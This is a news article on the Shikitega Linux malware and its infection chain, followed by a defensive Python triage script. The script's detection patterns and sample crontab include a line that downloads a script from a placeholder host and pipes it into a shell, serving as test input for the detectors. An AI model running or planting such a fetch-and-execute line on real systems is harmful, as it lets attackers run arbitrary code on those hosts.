A new stealthy Linux malware called Shikitega has been discovered that uses a multi-step infection chain to compromise endpoints and IoT devices and drop additional payloads.
“An attacker can take full control of the system, in addition to the cryptocurrency miner being run and configured to persist,” AT&T Alien Labs said in a new report released Tuesday.
The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor, Symbiote, Syslogk, OrBit and Lightning Framework.
Once deployed on a targeted host, the attack chain downloads and runs Metasploit’s “Mettle” meterpreter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and finally launches a cryptocurrency miner on infected devices.
The exact method by which the initial compromise is achieved remains unknown at this time, but what makes Shikitega elusive is its ability to download next-stage payloads from a command-and-control (C2) server and run them directly in memory.
Elevation of privilege is achieved by exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, allowing the adversary to abuse elevated permissions to retrieve and run final-stage shell scripts with root privileges to establish persistence and deploy the Monero crypto miner.
In another attempt to fly under the radar, the malware operators use the “Shikata ga nai” polymorphic encoder to make the payload harder for antivirus engines to detect, and abuse legitimate cloud services for C2 functions.
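The behaviours described above, in-memory payload execution, crontab persistence and reliance on the setuid pkexec binary that PwnKit abuses, each leave a trace a host check can look for. The following is an added defender-side triage script, not code from the AT&T Alien Labs report: the crontab heuristics, the sample crontab lines and the sample `/proc/<pid>/exe` link targets are constructed for illustration, and `live_exe_links()` is only useful on a real Linux host.

```python
"""Host triage helpers for the Shikitega-style behaviours discussed above.

Added example (not AT&T Alien Labs' code). All patterns and sample data are
constructed assumptions for illustration, not indicators from the report.
"""
from __future__ import annotations

import os
import re
import stat
from typing import Iterable

# Crontab heuristics (assumed, not published IoCs): entries that fetch and
# run a remote payload, decode a payload on the fly, or execute from a
# world-writable directory are worth a closer look.
SUSPICIOUS_CRON = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),  # download piped into a shell
    re.compile(r"\bbase64\s+(-d|--decode)\b"),        # payload decoded at run time
    re.compile(r"/(tmp|dev/shm|var/tmp)/\S+"),        # runs from a world-writable dir
]


def suspicious_cron_lines(lines: Iterable[str]) -> list[str]:
    """Return the crontab entries that match any heuristic (comments skipped)."""
    hits = []
    for line in lines:
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if any(p.search(entry) for p in SUSPICIOUS_CRON):
            hits.append(entry)
    return hits


def fileless_processes(exe_links: dict[int, str]) -> list[int]:
    """Given pid -> readlink('/proc/<pid>/exe'), return pids whose executable
    exists only in memory (memfd-backed, shown as '/memfd:...') or was
    unlinked after launch (the kernel appends ' (deleted)')."""
    return sorted(
        pid for pid, target in exe_links.items()
        if target.startswith("/memfd:") or target.endswith(" (deleted)")
    )


def live_exe_links() -> dict[int, str]:
    """Collect /proc/<pid>/exe targets on the running host (Linux only)."""
    links: dict[int, str] = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            links[int(name)] = os.readlink(f"/proc/{name}/exe")
        except OSError:  # process exited, or not readable without privilege
            continue
    return links


def is_setuid(mode: int) -> bool:
    """True if the setuid bit is set in a stat() st_mode value."""
    return bool(mode & stat.S_ISUID)


def pkexec_is_setuid(path: str = "/usr/bin/pkexec") -> bool | None:
    """Report whether pkexec is still setuid-root (None if it is not installed).
    Dropping the setuid bit was the widely used interim mitigation for
    CVE-2021-4034 on hosts that could not patch immediately."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return is_setuid(st.st_mode) and st.st_uid == 0


# Constructed sample input: a crontab with two suspicious entries.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update -q",
    "*/5 * * * * curl -s http://example.invalid/p.sh | sh",
    "@reboot /tmp/.x/run",
    "15 4 * * 0 /usr/local/bin/backup.sh --weekly",
]

# Constructed sample input: pid -> exe link target, as readlink would show it.
SAMPLE_EXE_LINKS = {
    1: "/usr/lib/systemd/systemd",
    812: "/usr/sbin/cron",
    4711: "/memfd:x (deleted)",
    4720: "/tmp/.x/run (deleted)",
    4733: "/usr/bin/python3",
}

if __name__ == "__main__":
    print("suspicious cron entries:", suspicious_cron_lines(SAMPLE_CRONTAB))
    print("fileless pids (sample):", fileless_processes(SAMPLE_EXE_LINKS))
    if os.path.isdir("/proc"):
        print("fileless pids (live):", fileless_processes(live_exe_links()))
    print("pkexec still setuid-root:", pkexec_is_setuid())
```

The crontab check is deliberately a coarse heuristic: any hit should be confirmed by reading the referenced script rather than treated as a verdict. The `/proc/<pid>/exe` check is the more reliable signal for the in-memory staging the report describes, because a process whose binary was never written to disk, or was deleted right after launch, cannot be matched against a file on disk at all.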
Shikitega also points to a trend of malicious actors extending their attack scope to the Linux operating system, which is widely used in cloud platforms and servers across the world, contributing to an increase in malware infections, including the LockBit and Cheerscrypt ransomware families.
According to Trend Micro’s 2022 Midyear Cybersecurity Report, “the emergence of these new Linux ransomware families corresponds directly to […] a 75% increase in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021.”
“Threat actors continue to research ways to deliver malware in new ways to stay under the radar and avoid detection,” said AT&T Alien Labs researcher Ofer Caspi.
“The Shikitega malware is delivered in a sophisticated way: it uses a polymorphic encoder and gradually delivers its payload, where each step only reveals a part of the total payload.”